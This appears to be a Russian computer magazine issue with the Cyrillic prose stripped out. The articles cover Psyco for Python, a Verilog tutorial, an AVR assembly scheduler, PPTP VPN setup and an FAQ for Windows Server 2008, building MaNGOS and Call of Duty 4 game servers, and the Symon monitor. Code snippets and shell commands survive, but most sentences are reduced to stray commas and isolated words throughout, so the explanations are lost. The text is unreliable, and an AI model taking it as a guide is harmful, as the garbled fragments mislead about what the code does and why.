NumPy , MatLab. Python

CPython,
JIT- . PsyCo.

.
. . , PsyCo :
import psyco
psyco.full()
from psyco.classes import *
#

.
, profile() PsyCo
,
.
. , . , , :
JIT- foo,
20%. , PsyCo
.
Python pystone.py,
( , , .).
PsyCo . ,
PsyCo 450%! , , .
PsyCo 20% .
. , PsyCo
i386- .
, - .
PsyCo,
, :
if __name__ == '__main__':
    try:
        import psyco
        psyco.full()
        #
    except ImportError:
        pass


PsyCo . , JTI-
, -, ,
.
,
.
PsyCo ,
PyPy.
, PsyCo .


, .
!
, , . ,
, ,
, . , ,
. ,
, .
.
,
Python -.
( )
. . ,
, , .
,
, . ,
. ,
,
. ,
.
, .

! z

>> phreaking
VSHMUK
/ DIVER@EDU.IOFFE.RU /

VERILOG

>> VERILOG
( ). , :
, , . Verilog, HDL (Hardware
Description Language).
.
erilog 1985 , .
IEEE 1364,

(Verilog-2001, SystemVerilog http:/ /en.wikipedia.org/wiki/
SystemVerilog), - .
, Verilog . -
, , ,
, - Altera Quartus ,
- .
C,
.
Verilog VHDL, ADA
Pascal , ,
. ,
, , ,
, .

HDL?
, -
. (
), - ,
(, ).
- HDL-.

HDL . ,
, , , ,
.
. .
HDL,
(hardware) :). ,
-, .
, ,
HDL, , . , , , !
,
Pascal HDL-. - ,
,
.
, , ?
. , -
. ,
, ,
, . Intel Core, , , .

Quartus 8.0


always
.
, Verilog.
1. . .
wait (reg1==reg2); // ,
//
@ (A or B)
// .
//, A B
@ (posedge C or negedge D)

posedge negedge . ,
0 1 D 1 0,
. ?
. ,
.
. Verilog
always @(posedge sysclock)....
2. . .
reg1=reg2;

3. .
. ,
. ,
( =), ?
,
,
. - ?
.
reg1<=reg2;
// reg1.
// .
reg3<=reg4;
// -,
// reg1.
......
// - reg1.

4. . .
if (reg1==2'b11) begin
    reg2<=0;
end
else begin
    reg2<=reg2+1'b1;
end

5. . .
parameter WRITE = 2'b11, READ = 2'b10, NONE = 2'b00;
//
case (reg1)
WRITE: reg2<=reg2+1'b1;
READ,NONE: begin
reg2<=0;
end
default:
reg2<=0;
endcase

6. . for, while, repeat, forever.


forever .
repeat (- ) .
while () , .
for (,,)
for, .


- .

. HDL
, , , ,
!


, HDL- .
,
.
,
Altera Cyclone Quartus altera.com.
,

- , Verilog
,
. (0)
(1) z, . ,
x,
, ,
- .
z x ,
-
, .
:
4'b10zz
// ,
,

,
!
, ,
HDL, .
, ,
.
-
, .
,
.
, . . , Verilog .


1. , , , .
- , , ,
. .

//
/*

*/

Verilog () ,
$ _, .
.
\,
. , , . : Character, cHaracter, $Character,
\c+Ha^racter.
Verilog . , (),
(b, o, d, h) . :
7'h7F // 127, (h hex) .
7'b1111_1111 // , . "_" .
10'b1111_1111 // 127, 7 , 10.
, 000_1111_1111.
//, -
, .
18 // , , Integer.
0.5 // float.

integer, time, real .


, , Verilog
.
, !
reg [2:6] Array [0:5]; //6 .

3. (wire).
, ,
, . -
, .
, -,
. ,
:
reg [7:0]device_config;
wire port_0_direction = device_config[0];
wire port_1_direction = device_config[1];
......
if (!port_0_direction)
    device_data[0] <= par_port_0[7:0];

port_0_direction device_config[0]. : , ,
device_config, :
port_0_direction = device_config[0] & device_config[2];

2. .
, , Verilog . :
reg [7:0] character;

8 ( )
character. ,
:
reg [7:0] var1;
reg [15:0] var2 = 16'b1001_0110_1011_1101;
...skip...
var1 [7:0] = var2[15:8];

var1 var2, . , 8'b1001_0110,


0x96h.
: , Verilog , reg.
port_0_direction 1, 0 2
device_config.
(wand), (wor),
tri0, tri1 , .
4. always & initial.
, . , ,
.
, - , ,
.
reg[7:0] counter;
always
//always
// ,
@(posedge Sysclock)
// ";"
// .
begin
counter = counter + 1'b1;
end


, always.
@ ( ). begin end
.
Sysclock 0 1,
counter .

(=,<=,if,case, etc.) . Verilog .
always initial, .
5. .
, begin end, .
, C.
, :
reg[7:0] counter = 0;
reg[7:0] anticounter = 0;
always @(posedge Sysclock) fork
counter = counter + 1'b1;
//<--
anticounter = anticounter - 1'b1;
//<--
join

counter anticounter -

. fork join
begin end, ,
!
6. .
(module) Verilog -
.
. ,
.

module Not (inputwire1, outwire1);
    input inputwire1;
    // ,
    output outwire1;
    reg outwire1;
    always @(inputwire1)
        outwire1<=!(inputwire1);
endmodule

.
, .
, ,
. (input), (output) (inout).

, . Verilog
,
.
, , HDL , ,
, .
Timing Analysis,
. ,
, ,
.
.
, (<=) (=) , .

,
. ,
,
- ( ),
, ,
.

-
, .
always.
, ? , .

module Not1 (inputwire1, outwire1);
    input inputwire1;
    // ,
    output outwire1;
    wire outwire1;
    assign outwire1 = !(inputwire1);
endmodule

,
, ,
. ,
. ?
7. .
, , :
(+),
(-),
(*),
(/),
(%),
, , , XOR (&,|,~,^)
, , (&&,||,!),
(==,!=,>,<,>=,<=)
(>>,<<)

,
:
(D, RS)

. a
b clock.
, switch. reset
0.
-
:).
module trig(clock, a, b, switch, reset, out);
    input clock, reset;
    //
    input a, b;
    //
    input switch;
    //
    output out;

    reg out;

    // . ,
    //,

    wire in;
    //
    assign in = switch ? a : b;
    //assign in = a ? 1 : 0;
    // D-,
    //assign in = a;
    // RS-, Set "a", Reset "reset"
    always @(posedge clock or posedge reset) //
        if (reset)
            // ,
            out <= 0;
        else
            //
            out <= in;
endmodule

reg[7:0] Lights=8'b0000_0001;
...skip...
Lights[7:0] = { Lights[0] , Lights[7:1] };

, 8
Lights. ,
, .
, . .

, . ,
, , .

,
. ,
. , -
, . z

>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /

>>
, - .
\\ ( ),
- , . , ,
. !
, , , ,
.
, ,
. , , , ,
, .
, , . ,
,
, .
? ,
! , ,
.

, , ,
, ,
.

,
( ,
- .).
, , ,

.
, .
, .
,
.. .
, , -
, .
.
, .
,
.
, , . . ,
, .
, , ,
( ). . ,
,
60 . :
!
, ,
?! ,
, .

CRT-.


.
20 . ,
, ? , ,
( ).
,
? ,
. , , .
, , ,
, .
, ,
,
.
,
. , ,
. , , ,
,

. ,
:
, 220
;
, (
, , )
, , , .
. ,
. ? ! , ,
.
. ?
,
. ,
, .
?
. .
-

,
, . ,
, .
,
( , 1000 ! .
), .
, ,
(
, ). ,
. ,
,
.
, : , , ,
. ,
, .
, , ,
, . ,

dvd

, ,

.



1) .
2) ,
- ( ).
, ,
.
3) \ , 2
.
4) - . ,

.


. !

, .
.

links
-

.



?
http://ru.wikipedia.
org/wiki/

. ,
,
,
.
-.
, ,
. 5-6
,
. , ,
:
;
( - );
-
, ;
, .
:).
, ,
. 5 ,
( 4000 !).
, , , .

5 20
.
100 .
, ,
.

.
.
(
, ).
. .
.
.
.
, , 150- 200 . .

, ,
,
H2O


( )


, ,
,
, . -
, - !
,
,
,
, . , \ .
.
.
. 1 200 (
).
!
. ,
, ?.
:
;
;
, ;
, ;
;
;
;
.
, ,
, . ,
. ,
, . . z

>> phreaking

DI_HALT@MAIL.RU

(DI HALT)

>>
, . ,
, . . ,
, , .

-
, Windows , , . , *nix-, QNX ucLinux.
, , , 32- . ? !
- ATMega128, ATTiny2313 2 . ,
,

700 , , .
600 ? .

?
AVR Studio, ,
? ?
, , . ,
, . ,

.
- . ,
, ,
, .
, .
, , ,
, .

, , ,
.

, ,
.
. ,
- , .
,
, ! , ,
. , -,
, ,
. . ,
. !

, , ! ()
, .
, .
.
, , .
, , , UART - INT0, -
. ,
, ,
, , .



. .
. .
. !
, .
. AVR , , . ,
. , ,
. .
UART. , ,
: , , .
,
UART, - .
, UART . ?
. : - .
.
. UART
.
: ,
. ,
, , . , UART , .


. . ! . ,

, , .
.
,


.
, , .
, , .
. AVR,
, . ,
86-, ,
. .


. .
Motorola, Serg2x2
51,
AVR . ,
dlinyj (
,
ATTiny2313).
, .

. . , - .
(PC) ,
. RJMP BRxx, PC . .
- .
.
. -
, , .
. ,
, .
.
,
.
defconst.inc . ,
, . :
.equ EV_Idle            = 0 ; NOP
.equ EV_KbdDataReceived = 1 ;
.equ EV_UnlockKeys      = 2 ;
.equ EV_DisplRegen      = 3 ;
.equ EV_SendPacket      = 4 ;
.equ EV_Timeout1        = 5 ;
.equ EV_Timeout2        = 6 ; Test ( )
.equ EV_Timeout3        = 7 ; Test ( )
.equ EV_Show            = 8 ;
.equ EV_TxComplete      = 9 ;

, . , ,

, .
, .
LoggerAttiny2313.asm,
, , .
:
EventsProcs:
.dw Idle                  ; [00] EV_Idle
.dw Proc_KbdDataReceived  ; [01] EV_KbdDataReceived
.dw Idle                  ; [02] EV_UnlockKeys
.dw Idle                  ; [03] EV_DisplRegen ;
.dw Idle                  ; [04] EV_SendPacket
.dw ProgTest1             ; [05] EV_Test Displ
.dw ProgTest2             ; [06] EV_Test LED
.dw ProgTest3             ; [07] EV_Test UART
.dw Proc_ShowReceivedData ; [08] EV_Show

EventProcs ,
. dw
. 00 aka
EV_Idle, Idle,
LoggerAttiny2313.asm. [03]
EV_DisplRegen Idle, . ,
,
, . , , .
Idle.
, Proc_ShowReceivedData ProgTest3,
. . ,
, , .
:
Proc_KbdDataReceived:
    NOP
    NOP
    NOP
    Ret

, , ,
.
, . . defconst.inc, :
- ( ,
0xFF) , ,
.
,

.

.equ EventsQueueSize = 11 ;
.equ EventsQueue = $A0    ; A0 AA (11 bytes)

EventsQueueSize , ,
. 11, ,
.
EventsQueue . , .
, .
, ,
. ,
, , ,
.
SendEvent, kernel.inc. Tmp1
,
. :
ldi Tmp1, EV_DisplRegen
rcall SendEvent

, idle
watchdog.
MainLoop:
    wdr                    ; watchdog
    rcall ProcessTaskQueue
    rcall Idle             ;
    rjmp MainLoop
Idle:
    nop
    ret

ProcessTaskQueue kernel.inc


.
,
. T1
( ,

). ,


.

,
, .
: OutComp1AInt,
LoggerAttiny2313.asm.
, ,
. .
.
, 0FF
, . ,
,
. -
( ), ,
, . . ( , ),

, .
, .
, !
defconst.inc.
.equ TimersPoolSize = 5 ;
.equ TimersPool = $B0   ; B0-BE

TimersPoolSize . , ,
, . . 3
, ,
. ,
ProgTest1 06543 .
05:65:43. .

-.
AVR.
TimersPool . ,
.

RETI
, .
, , .
, . ! z

>> SYN/ACK

/ CORE@SYNACK.RU /

PPTP- WINDOWS SERVER 2008

.
,
. VPN-
PPTP. ,
, .
PPTP?
PPTP
, () IP-,
. PPTP :
TCP- ;
GRE ( )
PPP- .
( MPPE), (
MPPC) . PPTP ,
NAT-. Microsoft Windows, Windows 95
OSR2, PPTP-. PPTP Linux, xBSD Mac OS X.
, -

PPTP, ,
, L2TP, IPSec SSTP (PPTP , , VPN-,
PPTP, , , ,
). : PPTP
PPPoE.
,
, .


Vista Win2k8 PPP . SPAP, EAP-MD5-CHAP MS-CHAP, ( MD4
DES). :

RRAS PPTP

PAP, CHAP, MSCHAP-v2 EAP-TLS (


-). MSCHAP-v2, . .
VPN- MPPE 40,
56 128- RSA RC4 . Windows - 40-
56-. , , Vista,
128- . , , Windows
- . ,
WinXP SP2 Win2k8.
, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL. , Ciphers\RC4.
,
dword Enabled ffffffff. ,
Microsoft , 40/56- RC4 Win2k8.
1 HKLM\System\CurrentControlSet\Services\Rasman\Parameters\AllowPPTPWeakCrypto .

Server). DHCP DNS. ,


VPN, RRAS .
L2TP SSTP, PPTP ,
(Certificate Services) . , VPN ( , ADSL
), ( ).
RRAS

PPTP WIN2K8
VPN , RRAS (Routing and Remote Access) NPS (Network Policy

info
PPTP
IPsec
PKI


VPN-.
SSTP VPN
(
z 2008 ).

PoPToP/MPD
Windows

z 2007
.

RRAS VPN

VPN ( NAT ) , ,
.
(
),
(Network Access Services) -

,
(Routing and
Remote Access Services).
.
,
. -

RRAS Netsh
RRAS-
Netsh (network shell). :

PPP. PPP:
> Netsh ras add multilink MULTI|BACP

> Netsh ras add authtype PAP|MD5CHAP|MSCHAPv2|EAP


:
Windows MSCHAP|SPAP. :
> Netsh ras set user
> Netsh ras set authmode STANDARD|NODCC|BYPASS
RRAS- AD:

set client . RRAS


Netsh :

> Netsh ras add registeredserver


PPP:
> Netsh ras add link SWC|LCP
SWC , LCP -

> Netsh ras dump > filename


> Netsh exec filename
, ras aaaa.
Netsh 2009 .

RRAS



; ,
,
.
( ) (Configure and Enable Routing
and Remote Access).
,
, . .
,
.
, :
(VPN ) () (VPN) ;
(NAT) IP-;
(VPN) NAT
, IP- ;

, .
. , SSTP (. VPN z_08_2008)
. PPTP
, ,
. ,
,
. , , , .
,
. , :
(VPN);
( );
( );
(NAT);
.
, , ,
. (VPN ),

(VPN). , ( ).
,
,
,
.

. VPN ,
VPN- .
Windows ,
, .
IP- IP-
VPN-:
.
RRAS, , RADIUS.
, RRAS
RADIUS. .
, , DHCP. RRAS DHCP-
, , Relay
agent (,
).


.
, , . ,
. , VPN PPPoE. ,
.
. , PPTP-, L2TP- SSTP- () 128, (
). ()
,
.
. .

. IPv4 IPv6 IP-, , DHCP-
.


links
PPTP RFC
2637 www.ietf.org/
rfc/rfc2637.txt.
MPPE (Microsoft Point-to-Point
Encryption) www.ietf.
org/rfc/rfc3078.txt.
MPPC (MicrosoftPoint-to-Point
Compression) www.
ietf.org/rfc/rfc2118.
txt.

video



,
,
PPTP- Win2k8


.

, .
649: .
NPS. ,
.

( NPS ,
2008 ).


,
CMAK (Connection
Manager Administration Kit). CMAK ,

,
. Win2k8 CMAK
Win2k Win95.
, ,
.
CMAK Win2k8,
. .

.

.
,
.
, . : Vista Windows 2000/2003/XP. , Vista
SSTP. .
;
. (-

) , .
CMAK Program Files\CMAK\Profiles.
(Realm name), , Windows AD
(user@domain.com).
, . , , VPN-.

VPN- VPN- . txt- (
go.microsoft.com/fwlink/?LinkId=80962).
,
VPN. ( IPv6 ).
( ). IPv4 DNS WINS
.
PPTP- IP-.

. ,
, . VPN ,
VPN. :
.
PPTP PPTP. , .

, dial-up .
. , , ,
.
: . ,
IE. ,
,
(, ).
( ,
), , .
. , , .

, .
. ,
.

- :
.
, ,
.
! z
>> SYN/ACK
GRINDER
/ GRINDER@UA.FM /

MEGAFAQ WINDOWS SERVER 2008

, Win2k8 . , .
.
?
Microsoft, 60 , .
60- , slmgr.vbs -dli. , 60 , ,
240 . . 60
slmgr.vbs -rearm .
KB948472 (support.microsoft.com/
kb/948472). , . ,
.
WIN2K8?
Win2k8, Microsoft, , , ,
( ). Win2k8, Windows Server 2008 (Windows Server 2008 MUI
Language Pack) www.microsoft.com. -

. (32 64) : XXX_x86fre_Server_LP_4-KRMSLP4_DVD.img


XXX_amd64fre_Server_LP_4-KRMSLPX4_DVD.img. Itanium (ia64)
. , , -, . IMG-
. Regional and Language Options.
Keyboards and Languages Install/uninstall languages
.
,
WAIK. Hyper-V
Hyper-V Language Pack (support.microsoft.com/kb/951636).

AD WIN2K3 WIN2K8?
Win2k3 Win2k8 .
. -
. , Win2k3
SP1/SP2 R2. Full
installation, Server Core . . , x86 Win2k3 x64, Enterprise Edition Standard Edition.
:
Standard Enterprise.
, .

WWT
Win2k8

WS2008: Upgrade Paths, Resource


Limits & Registry Values, blogs.technet.com.
AD , Win2k8 Flexible Single
Master Operations (FSMO) , .
AD .
, Active
Directory Migration Tool (ADMT):
, , . ADMT 3.1 ( ), ADMT v3.1 Guide: Migrating and Restructuring Active
Directory Domains , .

, ,
: , ?.
,
. : , . Access-Based Enumeration (ABE,
). ABE
(Share and Storage Management).
. ,
/ .

NETBIOS?
, Active Directory, NetBIOS , ,
DNS. , , . , ,
. Win2k8 . . :
MMC- ( ) .
,
. , ,
NetBIOS TCP/IP .
sc. ,
sc config /?. :


SERVER CORE?
Win2k8
. , . , ,
, Core Configurator.
Core Configurator . Server Core,
: , ,
, Remote Desktop, , , WinRM, , . , -
.
, . Server Core Configurator CodePlex (www.codeplex.com/CoreConfig)
Microsoft Public License (Ms-PL).
,
. SmartX
CoreConfigurator (www.smart-x.com), ( ) .

> sc start browser

NetBIOS net
view, Browstat.exe. support ( Win2k8) Browcon
(NetBIOS Browsing Console),
support.microsoft.com/kb/818092. :
> browstat.exe status WORKGROUP


?
, .
GLOBALNAMES WINDOWS SERVER 2008?


DNS- GlobalNames,
(,
,
DNS- Win2k8). WINS
( NetBIOS IP-). ?
WINS, GlobalNames


ABE Win2k8

( , -) .
GlobalNames , .
GlobalNames . GlobalNames
.
.
DNS- GlobalNames DNS (DNS Manager) ,
(Forward Lookup Zones),
(New Zone). Active Directory.
GlobalNames. , (Do not allow dynamic updates).

?
Win2k8, . ,
.
. , (CA) , .
Exchange .
RENDOM (Rename Domain),
Win2k8,
Win2k3. RENDOM technet.microsoft.com/en-us/windowsserver/bb405948.aspx,
. Win2k8 NETDOM,
.
, , , , . , server.com server.ru:
> NETDOM computername server.com /add:server.ru

. DNS- A- . DNS-. :
> NETDOM computername server.com /makeprimary:server.ru

:
> NETDOM computername server.ru /remove:server.com

CoreConfigurator
Server Core

ADSI
Edit (AdsiEdit.msc), .
, Win2k3, .
ADSI Edit
(Remote Server Administration Tools). (Role Administration
Tools) Active Directory (Active Directory
Domain Services Tools)
Active Directory (Active Directory Domain Controller Tools).
ADSI .
msDS-AdditionalDnsHostName,
.


?
Active
Directory. , AD
Ntdsutil,
DSRM (Directory Services Restore Mode)
<F8> . Win2k8 AD , .
. Active Directory (Active
Directory Domain Services), ,
. .
, AD
( ): Kerberos (Kerberos Key Distribution Center), DNS, (Intersite Messaging),
DFS (DFS Replication).
/ AD DS
:
> sc stop NTDS
> sc start NTDS

AD DS ,
.
, Win2k8 DSRM. HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
:

links

DNS-

ADSI Edit Win2k8

,
.
,
. WWT
, .
HTML- , Microsoft
.

Aero

0 ( )
DSRM , ;
1 DSRM,
AD DS ;
2 DSRM
.

,
WIN2K8?
. ,
, ( ). , ,
:
Works With Windows Server 2008 ,
;
Certified for Windows Server 2008 ,
, .
Hyper-V, .
Works With
Works With Tool for Windows Server
2008 (WWT).
,

WIN2K8
?
Win28 Vista ,
Vista . ( ,
64- ), Vista,
Win2k8.
Vista . (Desktop Experience). , (
, Aero), ,
.
:
> Servermanagercmd -i Desktop-Experience

,
.
, .

:
> Sc config themes start= auto
> Net start themes
> Sc config audiosrv start= auto
> Net start audiosrv

,

,

Applications That Are
Known to Work With
RODCs
technet.microsoft.
com/en-us/library/
cc732790.aspx.

Win2k8
www.
microsoft.com/
windowsserver2008.

Microsoft Hyper-V
Server 2008
www.
microsoft.com/
servers/hyper-vserver.

info


][, 2008-,



Win2k8!
WAIK


( 2009).

Desktop-Experience, WirelessNetworking, BitLocker, Backup-Features,


Windows Search PowerShell.
, Win2k8 .
,
. z

>> SYN/ACK
TURBINA
/ V.TURBINA@GMAIL.COM /


LINUX

World of Warcraft Call of Duty


. , , .
.
?
MaNGOS (Massive Network Game Object Server, getmangos.com)
WoW.
Linux, FreeBSD Windows.
, WoW- .
NPC. MaNGOS
, ,
. ,
.
.

$ mkdir source; cd source

: , , . SVN ( git)
0.13, 3.0.3 (build
9183) 2.4.3. MaNGOS 0.12
2.4.3 . 0.13,
. :
$ svn co http://svn2.assembla.com/svn/mangos-svn-mirror

git:


, Ubuntu8.04LTS(
Linux-). ,
git/SVN- . MySQL ( ) PostgreSQL, . , OpenSSL .

$ git clone git://github.com/mangos/mangos.git

ScriptDev2 (sf.net/projects/scriptdev2).
, , :
$ mkdir mangos/src/bindings/ScriptDev2

$ sudo apt-get install libssl-dev mysql-server mysql-client libmysqlclient15-dev autoconf automake1.9 libtool build-essential subversion patch zlibc libc6 git git-core

ScriptDev2, scriptdev2
Scriptdev2! :
$ cd mangos/src/bindings/ScriptDev2
$ svn co https://scriptdev2.svn.sourceforge.net/svnroot/scriptdev2

realmd

$ rm -r objdir

:
$ git apply src/bindings/ScriptDev2/patches/MaNGOS-200812-22-ScriptDev2.patch

:
$ patch -p0 < src/bindings/ScriptDev2/patches/MaNGOSr6765-ScriptDev2.patch

git . src/bindings .gitignore:


$ cat src/bindings/.gitignore
ScriptDev2

, ScriptDev2
. , :
$ cd ~/source/mangos
$ autoreconf --install --force
$ aclocal
$ autoheader
$ autoconf
$ automake --add-missing
$ automake src/bindings/ScriptDev2/Makefile

, ,
:
$ mkdir objdir; cd objdir
$ ./configure --enable-cli --enable-ra

(--enable-ra) (--enable-cli). , --prefix, --sysconfdir
--datadir. PostgreSQL,
--with-mysql=no --with-postgresql=yes.
:
$ make
$ sudo make install

:
$ make clean
$ cd ..


,
sql :
$ mysql -u root -p < sql/create_mysql.sql

mangos, mangos mangos:


$ cat sql/create_mysql.sql

GRANT USAGE ON *.* TO 'mangos'@'localhost' IDENTIFIED BY 'mangos' WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0;


MySQL ( Ubuntu ). , :
$ mysql -u mangos -p mangos < sql/mangos.sql
$ mysql -u mangos -p realmd < sql/realmd.sql
$ mysql -u mangos -p characters < sql/characters.sql

ScriptDev2:
$ mysql -u mangos -p scriptdev2 < src/bindings/ScriptDev2/sql/scriptdev2_structure.sql

, , .
.

?
, ,
. . , , . UDB (UnifiedDb, www.udbforums.org),
, YTDB (ytdb.kanet.ru), Silvermoon
(projectsilvermoon.net), Silver DataBase (SDB, opensvn.csie.org/SDB,
sf.net/projects/sdbmangos), MaNGOS-DBs (sf.net/projects/gmdb), EDB .
. ,
, ,
(100% ,
, ).
. UDB ( ), YTDB . - .
SVN- UDB:
$ svn co https://unifieddb.svn.sourceforge.net/svnroot
$ cd unifieddb


>> SYN/ACK
mysql> UPDATE `realmlist` SET `name` = 'My superpuper WoW server', `address` = '192.168.1.158' WHERE `id` = '1';
Query OK, 1 row affected (0.01 sec)

, , . :
mysql> SELECT * FROM `account` WHERE 1 LIMIT 1000;

account
realmd. (, admin/password):
mysql> DELETE FROM account;
mysql> INSERT INTO `account` (`username`,`sha_pass_hash`,`gmlevel`) VALUES ('admin',SHA1(CONCAT(UPPER('admin'),':',UPPER('password'))),'3');
mysql> quit;

FWv3
MaNGOS

,
MySQL, phpMyAdmin.

RAR. Ubuntu , :


:
mangosd.conf, realmd.conf scriptdev2.conf. /usr/local/
etc ( --sysconfdir). scriptdev2.conf
,
.

$ sudo apt-get install unrar

:
$ unrar e trunk/Full_DB/UDB_0.10.4_Core_6766_SD2_689.rar
$ mysql -u mangos -p mangos < UDB_0.10.4_Core_6766_SD2_689.sql

.
Updates 7 , , , .
cat trunk/Updates/0.10.4_additions/* > updates.sql.
,
, . , updates
mangos, realmd, realmlist, characters.
, . , 5632_characters.sql 5632 characters.
, , , . :
$ svn info ~/mangos/ | grep 'Revision:'
Revision: 205

: MaNGOS/0.13.0
(2008-12-30 02:00:26 Revision 6985 205).
6766 ( UDB_0.10.4_Core_6766_SD2_689.sql). , 30.12.2008 205/6985. . ,
, .
ScriptDev2. :
$ mysql -u mangos -p mangos < src/bindings/ScriptDev2/sql/mangos_full_scripts.sql
$ unrar e tags/EAI/EAI_0.0.4_323.rar
$ mysql -u mangos -p scriptdev2 < EAI_0.0.4_323.sql

, , : realmlist
( IP-):
$ mysql -umangos -pmangos
mysql> use realmd;
Database changed


$ sudo nano /usr/local/etc/realmd.conf


# MySQL hostname;port;username;password;database
# ,

LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
# , PID-
LogFile = "Realmd.log"
LogsDir = "/var/log"
PidFile = "/var/run/realmd.pid"
# ,
RealmServerPort = 3724
BindIP = "0.0.0.0"

mangosd.conf :
$ sudo nano /usr/local/etc/mangosd.conf
LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
WorldDatabaseInfo = "127.0.0.1;3306;mangos;mangos;mangos"
CharacterDatabaseInfo = "127.0.0.1;3306;mangos;mangos;characters"
MaxPingTime = 30
WorldServerPort = 8085
BindIP = "0.0.0.0"

mangos/contrib/extractor AD, ( Linux Windows).


(AD.exe), .
(, mangos.ru) dbc- /usr/local/share/mangos/dbc:
$ cd /usr/local/share/mangos
$ mkdir dbc; cd dbc
$ sudo unrar e ~/dbc.rar

WOW AD.exe,
maps . maps /usr/local/share/mangos.

>> SYN/ACK

links

Game Scanner

Quice
vmaps, WoW
vmap_extract_assembler_bin ( MaNGOS)
makevmaps_SIMPLE.bat. vmaps,
, maps.
:
$ sudo /usr/local/bin/mangos-realmd
$ sudo /usr/local/bin/mangos-worldd

, . ,
, ( ). ,
, nice -n -20. ,
,
Sourceforge . , MaNGOS
DB Terminal (sf.net/projects/mdbt), - MWFv3
(mangos-wf-v3.sf.net). ,
, , , Quice (quice.indomit.ru). WotLK (MaNGOS Beta
Server, sf.net/projects/wotlkmangosbeta), MaNGOS .

CALL OF DUTY 4
Call of Duty 4 :
, , , -
. , icculus.org/news/news.php?id=4095, Download cod-4.ru www.callofduty.ru/forum ( Linux).
Windows Linux,
Full .
, Full .
,
DVD- . :

cod4-linux-server-11212007.tar.bz2
$ tar xjvf cod4-linux-server-11212007.tar.bz2

(cod4_lnxded, cod4_lnxded-bin, libgcc_s.so.1, libstdc++.so.6),
chmod +x .
Setup/Data
cod4.
6.5 .
main , .iwd,
video, Mods ( mods), zone
localization.txt. ,
zone. ! - PunkBuster:
$ ./pbsetup.run -e
$ ./pbsetup.run --add-game=cod4 --add-gamepath=/where/i/uploaded/cod4/
$ ./pbsetup.run -u

, pbsetup.run ,
www.punkbuster.com.
:

, MaNGOS:
getmangos.com
ytdb.kanet.ru
forum.1wow.ru
mangos.ru
mangos.org.ru
,
COD:
www.callofduty.ru
cod-4.ru
legion-rus.clan.su

info

SourceForge.net

MaNGOS COD.
Counter Strike
Linux
#051.

$ sudo ./cod4_lnxded

,
+set loc_language 6.
IP-, , (, Punkbuster ,
;
, ):
$ sudo ./cod4_lnxded +set dedicated 1 +set net_ip 192.168.1.158 \
    +set net_port 28960 +exec server.cfg +map_rotate \
    +set sv_punkbuster 1 +set loc_language 6

+set dedicated 1
, +map_rotate .
main. netstat/sockstat :

$ mkdir cod4; cd cod4


$ sockstat | grep cod4

, icculus.org. (
3 ) :
$ wget -c http://0day.icculus.org/cod/

root cod4_lnxde 63855 24 udp4 192.168.1.158:28960 *:*

,
(20500, 29900, 20510 28960).
. z


>> SYN/ACK
SERGEY JAREMCHUK

ANDREY MATVEEV

SYMON:

, .

. ,
, , . Symon , ,
.
SYMON
Symon (www.xs4all.nl/~wpd/symon)
OpenBSD, FreeBSD,
NetBSD Linux. BSD- , , .
CPU, , , ,
PF . , Symon
- . ,
. :
symon ,
. ,
(CPU, ),
.
chroot.
symux symon RRD-.


symux , , , .
:
syweb PHP-, RRDtool .
sylcd , LCD- (
CrystalFontz HD44780).
SymuxClient.pm Perl, getsymonitem.pl.
. ,
phpSymon (www.ryanflannery.net/works/phpsymon), syweb, .
FreeBSD. ,
, , .
:

>> SYN/ACK

tcpdump?
Syweb
# cd /usr/ports/sysutils/symon
# make install clean

Symon, ,
RRDTool. :
# pkg_info | grep symon
symon-2.79_1 Performance and information monitoring tool

! .

SYMON
symon symux symon.conf symux.conf. /etc/:
# cp -v /usr/local/share/examples/symon/*.conf /etc/

. symon /etc/symon.conf. :
monitor "{" resources "}" [every] "stream" ["from" host]
["to"] host [ port ]

, , 2100
( UDP):
monitor {cpu(0), mem, if(lo0), io(wd0)} stream to 127.0.0.1 2100

, ,
. . symon(8). :
cpu/cpuiow (idle, user, nice, system,
interrupt), iowait cpuiow. 100,
2.
df .
if ( / , , , ).
io .
mem .
pf/pfq PF ( , ) ALTQ.
sensor , , . .
proc .
, OpenBSD, iptables ipfw,
pf. ,

: fatal: pf module not available.


, proc
. proc ps, ifconfig. fdisk dmesg.
, sysctl hw.sensors.
,
c_config.sh. ,
(
, io , CPU ):
# /usr/local/share/symon/c_config.sh > /etc/symon.conf

.
, , ,
, MySQL Clamd, :
# vi /etc/symon.conf
monitor{cpu(0),mem,mbuf,pf,df(sd0a),df(sd0d),df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
} stream to 127.0.0.1 2100

,
localhost IP- ( DNS-), : stream to 192.168.10.10 2100 (
). , 5 . ,
, time
. :
# /usr/local/libexec/symon -t
/etc/symon.conf: ok

, . symon , , .
,
'-d' '-u':
# /usr/local/libexec/symon -d -u
symon version 2.79
program id=9530
debug: symon packet size=362
sending packets to udp 127.0.0.1 2100


>> SYN/ACK

Symux -d
Syweb
started module io(wd0)

. ,
:
# /usr/local/libexec/symon

,
tcpdump -i lo0
2100 , /var/run/symon.pid symon ps au.
symon :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symon ]; then
echo 'starting symon'; /usr/local/libexec/symon
fi

# symon

, :
# /usr/local/libexec/symux -t
warning: /etc/symux.conf:7: file '/var/www/symon/rrds/
localhost/df_sd0e.rrd', guessedannot be opened
warning: /etc/symux.conf: no filename specified for stream
'df(sd0e)'

, , , . , :
# mkdir -p /var/www/symon/rrds/localhost

, !

SYMUX
Symux. symux.conf
, , /, .
:

symux RRD-. c_smrrds.sh,


symon. :
c_smrrds.sh [oneday] [interval <seconds>] [all] <rrd files>

:
# vi /etc/symux.conf
# symon
# mux 192.168.10.10 2100
mux 127.0.0.1 2100
#
source 127.0.0.1 {
accept {
# , ( symon.conf)
cpu(0), mem, mbuf, pf, df(sd0a), df(sd0d), df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
}
# ,
